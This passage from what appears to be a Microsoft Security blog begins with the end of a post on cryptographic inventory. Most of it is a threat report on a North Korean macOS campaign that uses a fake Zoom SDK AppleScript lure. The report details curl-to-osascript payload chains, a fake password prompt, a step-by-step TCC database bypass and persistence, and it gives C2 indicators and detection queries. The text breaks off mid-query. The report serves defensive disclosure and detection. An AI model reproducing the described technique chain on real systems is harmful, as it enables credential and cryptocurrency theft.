Keyfactor: Keyfactor AgileSec discovers, then continuously monitors, all instances of your cryptography, known and unknown, to understand where and how they are used across the organization. Assets are then processed to flag vulnerabilities to enable teams to efficiently remediate risks with advanced integration workflows, providing the base for crypto-agility and quantum readiness.
Forescout:Forescout Cyber Assurance solution on Azure allows a customer to determine real-time network risk of an enterprise asset including its usage of PQC and non-PQC communications, matrixed by 1,000’s of other attributes including application, protocol, country, geo, risk and posture across IT, IoT and OT environments.
Entrust:Entrust Cryptographic Security Platform delivers visibility, automation, and control across PKI, key and certificate lifecycle management, and HSMs within a scalable architecture built for crypto-agility and post-quantum readiness.
Isara: ISARA Advance™ is a crypto posture management solution for enterprises and agencies. Advance is deployed on Microsoft Azure to automate discovery and inventory, quantify the risks, prioritize, and remediate. Within hours of deployment, it discovers cryptographic threats due to outdated protocols, weaknesses in key strengths and algorithms, prioritizes, and allows remediation of the cryptography and configuration changes on the servers, apps, databases, and source code components.
Getting started: a customer checklist
Ready to begin building your cryptographic inventory? Here’s a practical checklist to get started:
Establish ownership: Assign clear accountability for cryptographic governance. This often spans security, infrastructure, and development teams. It ensures someone owns the overall inventory and posture.
Start inventory collection: Use the starter playbook above or a Microsoft Partner to begin collecting signals from code, runtime, network, and storage domains using Microsoft tools you already have.
Define crypto policy baselines: Document your organization’s cryptographic standards (approved algorithms, minimum key lengths, certificate validity periods, protocol versions). Align with industry standards and compliance requirements.
Prioritize exposures: Not all findings are equal. Prioritize based on asset criticality, exposure (internet-facing vs. internal), and compliance mandates.
Plan remediation: Identify remediation approaches for high-priority findings—library updates, certificate rotations, protocol reconfigurations. Build runbooks and automation where possible.
Leverage partners to accelerate: If you need broader coverage, faster deployment, or specialized capabilities, explore the partner ecosystem on Azure Marketplace to find solutions that integrate with your Microsoft security investments and accelerate your efforts.
Cryptographic posture management is a journey, not a destination. As standards evolve, new vulnerabilities emerge, and quantum computing advances, your inventory and operating model will need to adapt. But, by starting now, with the tools you have, the partners who can help, and a clear operating model, you’ll be well-positioned not only for the quantum era but for sound cryptographic hygiene in the years ahead.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
Microsoft Threat Intelligence uncovered a macOS‑focused cyber campaign by the North Korean threat actor Sapphire Sleet that relies on social engineering rather than software vulnerabilities. By impersonating a legitimate software update, threat actors tricked users into manually running malicious files, allowing them to steal passwords, cryptocurrency assets, and personal data while avoiding built‑in macOS security checks. This activity highlights how convincing user prompts and trusted system tools can be abused, and why awareness and layered security defenses remain critical.
Microsoft Threat Intelligence identified a campaign by North Korean state actor Sapphire Sleet demonstrating new combinations of macOS-focused execution patterns and techniques, enabling the threat actor to compromise systems through social engineering rather than software exploitation. In this campaign, Sapphire Sleet takes advantage of user‑initiated execution to establish persistence, harvest credentials, and exfiltrate sensitive data while operating outside traditional macOS security enforcement boundaries. While the techniques themselves are not novel, this analysis highlights execution patterns and combinations that Microsoft has not previously observed for this threat actor, including how Sapphire Sleet orchestrates these techniques together and uses AppleScript as a dedicated, late‑stage credential‑harvesting component integrated with decoy update workflows.
After discovering the threat, Microsoft shared details of this activity with Apple as part of our responsible disclosure process. Apple has since implemented updates to help detect and block infrastructure and malware associated with this campaign. We thank the Apple security team for their collaboration in addressing this activity and encourage macOS users to keep their devices up to date with the latest security protections.
This activity demonstrates how threat actors continue to rely on user interaction and trusted system utilities to bypass macOS platform security protections, rather than exploiting traditional software vulnerabilities. By persuading users to manually execute AppleScript or Terminal‑based commands, Sapphire Sleet shifts execution into a user‑initiated context, allowing the activity to proceed outside of macOS protections such as Transparency, Consent, and Control (TCC), Gatekeeper, quarantine enforcement, and notarization checks. Sapphire Sleet achieves a highly reliable infection chain that lowers operational friction and increases the likelihood of successful compromise—posing an elevated risk to organizations and individuals involved in cryptocurrency, digital assets, finance, and similar high‑value targets that Sapphire Sleet is known to target.
In this blog, we examine the macOS‑specific attack chain observed in recent Sapphire Sleet intrusions, from initial access using malicious .scpt files through multi-stage payload delivery, credential harvesting using fake system dialogs, manipulation of the macOS TCC database, persistence using launch daemons, and large-scale data exfiltration. We also provide actionable guidance, Microsoft Defender detections, hunting queries, and indicators of compromise (IOCs) to help defenders identify similar threats and strengthen macOS security posture.
Sapphire Sleet’s campaign lifecycle
Initial access and social engineering
Sapphire Sleet is a North Korean state actor active since at least March 2020 that primarily targets the finance sector, including cryptocurrency, venture capital, and blockchain organizations. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.
Recent campaigns demonstrate expanded execution mechanisms across operating systems like macOS, enabling Sapphire Sleet to target a broader set of users through parallel social engineering workflows.
Sapphire Sleet operates a well‑documented social engineering playbook in which the threat actor creates fake recruiter profiles on social media and professional networking platforms, engages targets in conversations about job opportunities, schedules a technical interview, and directs targets to install malicious software, which is typically disguised as a video conferencing tool or software developer kit (SDK) update.
In this observed activity, the target was directed to download a file called Zoom SDK Update.scpt—a compiled AppleScript that opens in macOS Script Editor by default. Script Editor is a trusted first-party Apple application capable of executing arbitrary shell commands using the do shell script AppleScript command.
Lure file and Script Editor execution
Figure 1. Initial access: The .scpt lure file as seen in macOS Script Editor
The malicious Zoom SDK Update.scpt file is crafted to appear as a legitimate Zoom SDK update when opened in the macOS Script Editor app, beginning with a large decoy comment block that mimics benign upgrade instructions and gives the impression of a routine software update. To conceal its true behavior, the script inserts thousands of blank lines immediately after this visible content, pushing the malicious logic far below the scrollable view of the Script Editor window and reducing the likelihood that a user will notice it.
Hidden beneath this decoy, the script first launches a harmless looking command that invokes the legitimate macOS softwareupdate binary with an invalid parameter, an action that performs no real update but launches a trusted Apple‑signed process to reinforce the appearance of legitimacy. Following this, the script executes its malicious payload by using curl to retrieve threat actor‑controlled content and immediately passes the returned data to osascript for execution using the run script result instruction. Because the content fetched by curl is itself a new AppleScript, it is launched directly within the Script Editor context, initiating a payload delivery in which additional stages are dynamically downloaded and executed.
Figure 2. The AppleScript lure with decoy content and payload execution
Execution and payload delivery
Cascading curl-to-osascript execution
When the user opens the Zoom SDK Update.scpt file, macOS launches the file in Script Editor, allowing Sapphire Sleet to transition from a single lure file to a multi-stage, dynamically fetched payload chain. From this single process, the entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier.
Figure 3. Process tree showing cascading execution from Script Editor
The main payload fetched by the mac-cur1 user agent is the attack orchestrator. Once executed within the Script Editor, it performs immediate reconnaissance, then kicks off parallel operations using additional curl commands with different user-agent strings.
Note the URL path difference: mac-cur1 through mac-cur3 fetch from /version/ (AppleScript payloads piped directly to osascript for execution), while mac-cur4 and mac-cur5 fetch from /status/ (ZIP archives containing compiled macOS .app bundles).
The following table summarizes the curl chain used in this campaign.
User agent
URL path
Purpose
mac-cur1
/fix/mac/update/version/
Main orchestrator (piped to osascript) beacon. Downloads com.apple.cli host monitoringcomponent and services backdoor
mac-cur2
/fix/mac/update/version/
Invokes curl with mac-cur4 which downloads credential harvester systemupdate.app
mac-cur3
/fix/mac/update/version/
TCC bypass + data collection + exfiltration (wallets, browser, keychains, history, Apple Notes, Telegram)
Figure 4. The curl chain showing user-agent strings and payload routing
Reconnaissance and C2 registration
After execution, the malware next identifies and registers the compromised device with Sapphire Sleet infrastructure. The malware starts by collecting basic system details such as the current user, host name, system time, and operating system install date. This information is used to uniquely identify the compromised device and track subsequent activity.
The malware then registers the compromised system with its command‑and‑control (C2) infrastructure. The mid value represents the device’s universally unique identifier (UUID), the did serves as a campaign‑level tracking identifier, and the user field combines the system host name with the device serial number to uniquely label the targeted user.
Figure 5. C2 registration with device UUID and campaign identifier
Host monitoring component: com.apple.cli
The first binary deployed is a host monitoring component called com.apple.cli—a ~5 MB Mach-O binary disguised with an Apple-style naming convention.
The mac-cur1 payload spawns an osascript that downloads and launches com.apple.cli:
Figure 6. com.apple.cli deployment using osascript
The host monitoring component repeatedly executes a series of system commands to collect environment and runtime information, including the macOS version (sw_vers), the current system time (date -u), and the underlying hardware model (sysctl hw.model). It then runs ps aux in a tight loop to capture a full, real‑time list of running processes.
During execution, com.apple.cli performs host reconnaissance while maintaining repeated outbound connectivity to the threat actor‑controlled C2 endpoint 83.136.208[.]246:6783. The observed sequencing of reconnaissance activity and network communication is consistent with staging for later operational activity, including privilege escalation, and exfiltration.
In parallel with deploying com.apple.cli, the mac-cur1 orchestrator also deploys a second component, the services backdoor, as part of the same execution flow; its role in persistence and follow‑on activity is described later in this blog.
Credential access
Credential harvester: systemupdate.app
After performing reconnaissance, the mac-cur1 orchestrator begins parallel operations. During the mac‑cur2 stage of execution (independent from the mac-cur1 stage), Sapphire Sleet delivers an AppleScript payload that is executed through osascript. This stage is responsible for deploying the credential harvesting component of the attack.
Before proceeding, the script checks for the presence of a file named .zoom.log on the system. This file acts as an infection marker, allowing Sapphire Sleet to determine whether the device has already been compromised. If the marker exists, deployment is skipped to avoid redundant execution across sessions.
If the infection marker is not found, the script downloads a compressed archive through the mac-cur4 user agent that contains a malicious macOS application named (systemupdate.app), which masquerades as the legitimate system update utility by the same name. The archive is extracted to a temporary location, and the application is launched immediately.
When systemupdate.app launches, the user is presented with a native macOS password dialog that is visually indistinguishable from a legitimate system prompt. The dialog claims that the user’s password is required to complete a software update, prompting the user to enter their credentials.
After the user enters their password, the malware performs two sequential actions to ensure the credential is usable and immediately captured. First, the binary validates the entered password against the local macOS authentication database using directory services, confirming that the credential is correct and not mistyped. Once validation succeeds, the verified password is immediately exfiltrated to threat actor‑controlled infrastructure using the Telegram Bot API, delivering the stolen credential directly to Sapphire Sleet.
Figure 7. Password popup given by fake systemupdate.app
Decoy completion prompt: softwareupdate.app
After credential harvesting is completed using systemupdate.app, Sapphire Sleet deploys a second malicious application named softwareupdate.app, whose sole purpose is to reinforce the illusion of a legitimate update workflow. This application is delivered during a later stage of the attack using the mac‑cur5 user‑agent. Unlike systemupdate.app, softwareupdate.app does not attempt to collect credentials. Instead, it displays a convincing “system update complete” dialog to the user, signaling that the supposed Zoom SDK update has finished successfully. This final step closes the social engineering loop: the user initiated a Zoom‑themed update, was prompted to enter their password, and is now reassured that the process completed as expected, reducing the likelihood of suspicion or further investigation.
Persistence
Primary backdoor and persistence installer: services binary
The services backdoor is a key operational component in this attack, acting as the primary backdoor and persistence installer. It provides an interactive command execution channel, establishes persistence using a launch daemon, and deploys two additional backdoors. The services backdoor is deployed through a dedicated AppleScript executed as part of the initial mac‑cur1 payload that also deployed com.apple.cli, although the additional backdoors deployed by services are executed at a later stage.
During deployment, the services backdoor binary is first downloaded using a hidden file name (.services) to reduce visibility, then copied to its final location before the temporary file is removed. As part of installation, the malware creates a file named auth.db under ~/Library/Application Support/Authorization/, which stores the path to the deployed services backdoor and serves as a persistent installation marker. Any execution or runtime errors encountered during this process are written to /tmp/lg4err, leaving behind an additional forensic artifact that can aid post‑compromise investigation.
Figure 8. Services backdoor deployment using osascript
Unlike com.apple.cli, the services backdoor uses interactive zsh shells (/bin/zsh -i) to execute privileged operations. The -i flag creates an interactive terminal context, which is required for sudo commands that expect interactive input.
Figure 9. Interactive zsh shell execution by the services backdoor
Additional backdoors: icloudz and com.google.chromes.updaters
Of the additional backdoors deployed by services, the icloudz backdoor is a renamed copy of the previously deployed services backdoor and shares the same SHA‑256 hash, indicating identical underlying code. Despite this, it is executed using a different and more evasive technique. Although icloudz shares the same binary as .services, it operates as a reflective code loader—it uses the macOS NSCreateObjectFileImageFromMemory API to load additional payloads received from its C2 infrastructure directly into memory, rather than writing them to disk and executing them conventionally.
The icloudz backdoor is stored at ~/Library/Application Support/iCloud/icloudz, a location and naming choice intended to resemble legitimate iCloud‑related artifacts. Once loaded into memory, two distinct execution waves are observed. Each wave independently initializes a consistent sequence of system commands: existing caffeinate processes are stopped, caffeinate is relaunched using nohup to prevent the system from sleeping, basic system information is collected using sw_vers and sysctl -n hw.model, and an interactive /bin/zsh -i shell is spawned. This repeated initialization suggests that the component is designed to re‑establish execution context reliably across runs.
From within the interactive zsh shell, icloudz deploys an additional (tertiary) backdoor, com.google.chromes.updaters, to disk at ~/Library/Google/com.google.chromes.updaters. The selected directory and file name closely resemble legitimate Google application data, helping the file blend into the user’s Home directory and reducing the likelihood of casual inspection. File permissions are adjusted; ownership is set to allow execution with elevated privileges, and the com.google.chromes.updaters binary is launched using sudo.
To ensure continued execution across reboots, a launch daemon configuration file named com.google.webkit.service.plist is installed under /Library/LaunchDaemons. This configuration causes icloudz to launch automatically at system startup, even if no user is signed in. The naming convention deliberately mimics legitimate Apple and Google system services, further reducing the chance of detection.
The com.google.chromes.updaters backdoor is the final and largest component deployed in this attack chain, with a size of approximately 7.2 MB. Once running, it establishes outbound communication with threat actor‑controlled infrastructure, connecting to the domain check02id[.]com over port 5202. The process then enters a precise 60‑second beaconing loop. During each cycle, it executes minimal commands such as whoami to confirm the execution context and sw_vers -productVersion to report the operating system version. This lightweight heartbeat confirms the process remains active, is running with elevated privileges, and is ready to receive further instructions.
Privilege escalation
TCC bypass: Granting AppleEvents permissions
Before large‑scale data access and exfiltration can proceed, Sapphire Sleet must bypass macOS TCC protections. TCC enforces user consent for sensitive inter‑process interactions, including AppleEvents, the mechanism required for osascript to communicate with Finder and perform file-level operations. The mac-cur3 stage silently grants itself these permissions by directly manipulating the user-level TCC database through the following sequence.
The user-level TCC database (~/Library/Application Support/com.apple.TCC/TCC.db) is itself TCC-protected—processes without Full Disk Access (FDA) cannot read or modify it. Sapphire Sleet circumvents this by directing Finder, which holds FDA by default on macOS, to rename the com.apple.TCC folder. Once renamed, the TCC database file can be copied to a staging location by a process without FDA.
Sapphire Sleet then uses sqlite3 to inject a new entry into the database’s access table. This entry grants /usr/bin/osascript permission to send AppleEvents to com.apple.finder and includes valid code-signing requirement (csreq) blobs for both binaries, binding the grant to Apple-signed executables. The authorization value is set to allowed (auth_value=2) with a user-set reason (auth_reason=3), ensuring no user prompt is triggered. The modified database is then copied back into the renamed folder, and Finder restores the folder to its original name. Staging files are deleted to reduce forensic traces.
Figure 10. Overwriting original TCC database with modified version
Collection and exfiltration
With TCC bypassed, credentials stolen, and backdoors deployed, Sapphire Sleet launches the next phase of attack: a 575-line AppleScript payload that systematically collects, stages, compresses, and exfiltrates seven categories of data.
Exfiltration architecture
Every upload follows a consistent pattern and is executed using nohup, which allows the command to continue running in the background even if the initiating process or Terminal session exits. This ensures that data exfiltration can complete reliably without requiring the threat actor to maintain an active session on the system.
The auth header provides the upload authorization token, and the mid header ties the upload to the compromised device’s UUID.
Figure 11. Exfiltration upload pattern with nohup
Data collected during exfiltration
Host and system reconnaissance: Before bulk data collection begins, the script records basic system identity and hardware information. This includes the current username, system host name, macOS version, and CPU model. These values are appended to a per‑host log file and provide Sapphire Sleet with environmental context, hardware fingerprinting, and confirmation of the target system’s characteristics. This reconnaissance data is later uploaded to track progress and correlate subsequent exfiltration stages to a specific device.
Installed applications and runtime verification: The script enumerates installed applications and shared directories to build an inventory of the system’s software environment. It also captures a live process listing filtered for threat actor‑deployed components, allowing Sapphire Sleet to verify that earlier payloads are still running as expected. These checks help confirm successful execution and persistence before proceeding further.
Messaging session data (Telegram): Telegram Desktop session data is collected by copying the application’s data directories, including cryptographic key material and session mapping files. These artifacts are sufficient to recreate the user’s Telegram session on another system without requiring reauthentication. A second collection pass targets the Telegram App Group container to capture the complete local data set associated with the application.
Browser data and extension storage: For Chromium‑based browsers, including Chrome, Brave, and Arc, the script copies browser profiles and associated databases. This includes saved credentials, cookies, autofill data, browsing history, bookmarks, and extension‑specific storage. Particular focus is placed on IndexedDB entries associated with cryptocurrency wallet extensions, where wallet keys and transaction data are stored. Only IndexedDB entries matching a targeted set of wallet extension identifiers are collected, reflecting a deliberate and selective approach.
macOS keychain: The user’s sign-in keychain database is bundled alongside browser data. Although the keychain is encrypted, Sapphire Sleet has already captured the user’s password earlier in the attack chain, enabling offline decryption of stored secrets once exfiltrated.
Cryptocurrency desktop wallets: The script copies the full application support directories for popular cryptocurrency desktop wallets, including Ledger Live and Exodus. These directories contain wallet configuration files and key material required to access stored cryptocurrency assets, making them high‑value targets for exfiltration.
SSH keys and shell history: SSH key directories and shell history files are collected to enable potential lateral movement and intelligence gathering. SSH keys may provide access to additional systems, while shell history can reveal infrastructure details, previously accessed hosts, and operational habits of the targeted user.
Apple Notes: The Apple Notes database is copied from its application container and staged for upload. Notes frequently contain sensitive information such as passwords, internal documentation, infrastructure details, or meeting notes, making them a valuable secondary data source.
System logs and failed access attempts: System log files are uploaded directly without compression. These logs provide additional hardware and execution context and include progress markers that indicate which exfiltration stages have completed. Failed collection attempts—such as access to password manager containers that are not present on the system—are also recorded and uploaded, allowing Sapphire Sleet to understand which targets were unavailable on the compromised host.
Exfiltration summary
#
Data category
ZIP name
Upload port
Estimated sensitivity
1
Telegram session
tapp_<user>.zip
8443
Critical — session hijack
2
Browser data + Keychain
ext_<user>.zip
8443
Critical — all passwords
3
Ledger wallet
ldg_<user>.zip
8443
Critical — crypto keys
4
Exodus wallet
exds_<user>.zip
8443
Critical — crypto keys
5
SSH + shell history
hs_<user>.zip
8443
High — lateral movement
6
Apple Notes
nt_<user>.zip
8443
Medium-High
7
System log
lg_<user> (no zip)
8443
Low — fingerprinting
8
Recon log
flog (no zip)
8443
Low — inventory
9
Credentials
Telegram message
443 (Telegram API)
Critical — sign-in password
All uploads use the upload authorization token fwyan48umt1vimwqcqvhdd9u72a7qysi and the machine identifier 82cf5d92-87b5-4144-9a4e-6b58b714d599.
Defending against Sapphire Sleet intrusion activity
As part of a coordinated response to this activity, Apple has implemented platform-level protections to help detect and block infrastructure and malware associated with this campaign. Apple has deployed Apple Safe Browsing protections in Safari to detect and block malicious infrastructure associated with this campaign. Users browsing with Safari benefit from these protections by default. Apple has also deployed XProtect signatures to detect and block the malware families associated with this campaign—macOS devices receive these signature updates automatically.
Microsoft recommends the following mitigation steps to defend against this activity and reduce the impact of this threat:
Educate users about social engineering threats originating from social media and external platforms, particularly unsolicited outreach requesting software downloads, virtual meeting tool installations, or execution of terminal commands. Users should never run scripts or commands shared through messages, calls, or chats without prior approval from their IT or security teams.
Block or restrict the execution of .scpt (compiled AppleScript) files and unsigned Mach-O binaries downloaded from the internet. Where feasible, enforce policies that prevent osascript from executing scripts sourced from external locations.
Always inspect and verify files downloaded from external sources, including compiled AppleScript (.scpt) files. These files can execute arbitrary shell commands via macOS Script Editor—a trusted first-party Apple application—making them an effective and stealthy initial access vector.
Limit or audit the use of curl piped to interpreters (such as curl | osascript, curl | sh, curl | bash). Social engineering campaigns by Sapphire Sleet rely on cascading curl-to-interpreter chains to avoid writing payloads to disk. Organizations should monitor for and restrict piped execution patterns originating from non-standard user-agent strings.
Exercise caution when copying and pasting sensitive data such as wallet addresses or credentials from the clipboard. Always verify that the pasted content matches the intended source to avoid falling victim to clipboard hijacking or data tampering attacks.
Monitor for unauthorized modifications to the macOS TCC database. This campaign manipulates TCC.db to grant AppleEvents permissions to osascript without user consent—a prerequisite for the large-scale data exfiltration phase. Look for processes copying, modifying, or overwriting ~/Library/Application Support/com.apple.TCC/TCC.db.
Audit LaunchDaemon and LaunchAgent installations. This campaign installs a persistent launch daemon (com.google.webkit.service.plist) that masquerades as a legitimate Google or Apple service. Monitor /Library/LaunchDaemons/ and ~/Library/LaunchAgents/ for unexpected plist files, particularly those with com.google.* or com.apple.* naming conventions not belonging to genuine vendor software.
Protect cryptocurrency wallets and browser credential stores. This campaign targets nine specific crypto wallet extensions (Sui, Phantom, TronLink, Coinbase, OKX, Solflare, Rabby, Backpack) plus Bitwarden, and exfiltrates browser sign-in data, cookies, and keychain databases. Organizations handling digital assets should enforce hardware wallet policies and rotate browser-stored credentials regularly.
Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:
Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
Turn on network protection to block connections to malicious domains and IP addresses.
Microsoft Defender detection and hunting guidance
Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Microsoft Defender for Endpoint
– Enumeration of files with sensitive data
– Suspicious File Copy Operations Using CoreUtil
– Suspicious archive creation
– Remote exfiltration activity
– Possible exfiltration of archived data
Command and control
– Mach-O backdoors beaconing to C2 (com.apple.cli, services, com.google.chromes.updaters)
Microsoft Defender Antivirus
– Trojan:MacOS/NukeSped.D
– Backdoor:MacOS/FlowOffset.B!dha
– Backdoor:MacOS/FlowOffset.C!dha
Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.
Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.
Threat intelligence reports
Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following advanced hunting queries to find related activity in their networks:
Suspicious osascript execution with curl piping
Search for curl commands piping output directly to osascript, a core technique in this Sapphire Sleet campaign’s cascading payload delivery chain.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "osascript" or InitiatingProcessFileName == "osascript"
| where ProcessCommandLine has "curl" and ProcessCommandLine has_any ("osascript", "| sh", "| bash")
| project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessFileName
Suspicious curl activity with campaign user-agent strings
Search for curl commands using user-agent strings matching the Sapphire Sleet campaign tracking identifiers (mac-cur1 through mac-cur5, audio, beacon).
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "curl" or ProcessCommandLine has "curl"
| where ProcessCommandLine has_any ("mac-cur1", "mac-cur2", "mac-cur3", "mac-cur4", "mac-cur5", "-A audio", "-A beacon")
| project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Detect connectivity with known C2 infrastructure
Search for network connections to the Sapphire Sleet C2 domains and IP addresses used in this campaign.
let c2_domains = dynamic(["uw04webzoom.us", "uw05webzoom.us", "uw03webzoom.us", "ur01webzoom.us", "uv01webzoom.us", "uv03webzoom.us", "uv04webzoom.us", "ux06webzoom.us", "check02id.com"]);
let c2_ips = dynamic(["188.227.196.252", "83.136.208.246", "83.136.209.22", "83.136.208.48", "83.136.210.180", "104.145.210.107"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (c2_domains) or RemoteIP in (c2_ips)
| project Timestamp, DeviceId, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
TCC database manipulation detection
Search for processes that copy, modify, or overwrite the macOS TCC database, a key defense evasion technique used by this campaign to grant unauthorized AppleEvents permissions.
DeviceFileEvents
| where Timestamp > ago(30d)
| where FolderPath has "com.apple.TCC" and FileName == "TCC.db"
| where ActionType in ("FileCreated", "FileModified", "FileRenamed")
| project Timestamp, DeviceId, DeviceName, ActionType, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
Suspicious LaunchDaemon creation masquerading as legitimate services
Search for LaunchDaemon plist files created in /Library/LaunchDaemons that masquerade as Google or Apple services, matching the persistence technique used by the services/icloudz backdoor.
DeviceFileEvents
| where Timestamp > ago(30d)
| where FolderPath startswith "/Library/LaunchDaemons/"
| where FileName startswith "com.google." or FileName startswith "com.apple."
| where ActionType == "FileCreated"
| project Timestamp, DeviceId, DeviceName, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, SHA256
Malicious binary execution from suspicious paths
Search for execution of binaries from paths commonly used by Sapphire Sleet, including hidden Library directories, /private/tmp/, and user-specific Application Support folders.
Credential harvesting using dscl authentication check
Search for dscl -authonly commands used by the fake password dialog (systemupdate.app) to validate stolen credentials before exfiltration.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "dscl" or ProcessCommandLine has "dscl"
| where ProcessCommandLine has "-authonly"
| project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Telegram Bot API exfiltration detection
Search for network connections to Telegram Bot API endpoints, used by this campaign to exfiltrate stolen credentials.
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has "api.telegram.org" and RemoteUrl has "/bot"
| project Timestamp, DeviceId, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
Reflective code loading using NSCreateObjectFileImageFromMemory
Search for evidence of reflective Mach-O loading, the technique used by the icloudz backdoor to execute code in memory.
DeviceEvents
| where Timestamp > ago(30d)
| where ActionType has "NSCreateObjectFileImageFromMemory"
or AdditionalFields has "NSCreateObjectFileImageFromMemory"
| project Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, AdditionalFields
Suspicious caffeinate and sleep prevention activity
Search for caffeinate process stop-and-restart patterns used by the services and icloudz backdoors to prevent the system from sleeping during backdoor operations.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where ProcessCommandLine has "caffeinate"
| where InitiatingProcessCommandLine has_any ("icloudz", "services", "chromes.updaters", "zsh -i")
| project Timestamp, DeviceId, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Detect known malicious file hashes
Search for the specific malicious file hashes associated with this Sapphire Sleet campaign across file events.
let malicious_hashes = dynamic([
"2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419",
"05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53",
"5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7",
"5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5",
"95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63",
"8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c",
"a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640"
]);
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in (malicious_hashes)
| project Timestamp, DeviceId, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
Data staging and exfiltration activity
Search for ZIP archive creation in /tmp/ directories followed by curl uploads matching the staging-and-exfiltration pattern used for browser data, crypto wallets, Telegram sessions, SSH keys, and Apple Notes.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where (ProcessCommandLine has "zip" and ProcessCommandLine has "/tmp/")
or (ProcessCommandLine has "curl" and ProcessCommandLine has_any ("tapp_", "ext_", "ldg_", "exds_", "hs_", "nt_", "lg_"))
| project Timestamp, DeviceId, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Search for Script Editor (the default handler for .scpt files) spawning curl, osascript, or shell commands—the initial execution vector in this campaign.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessFileName == "Script Editor" or InitiatingProcessCommandLine has "Script Editor"
| where FileName has_any ("curl", "osascript", "sh", "bash", "zsh")
| project Timestamp, DeviceId, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Detect network indicators of compromise
The following query checks for connections to the Sapphire Sleet C2 domains and IP addresses across network session data:
let lookback = 30d;
let ioc_domains = dynamic(["uw04webzoom.us", "uw05webzoom.us", "uw03webzoom.us", "ur01webzoom.us", "uv01webzoom.us", "uv03webzoom.us", "uv04webzoom.us", "ux06webzoom.us", "check02id.com"]);
let ioc_ips = dynamic(["188.227.196.252", "83.136.208.246", "83.136.209.22", "83.136.208.48", "83.136.210.180", "104.145.210.107"]);
DeviceNetworkEvents
| where TimeGenerated > ago(lookback)
| where RemoteUrl has_any (ioc_domains) or RemoteIP in (ioc_ips)
| summarize EventCount=count() by DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
Detect file hash indicators of compromise
The following query searches for the known malicious file hashes associated with this campaign across file, process, and security event data:
let selectedTimestamp = datetime(2026-01-01T00:00:00.0000000Z);
let FileSHA256 = dynamic([
"2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419",
"05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53",
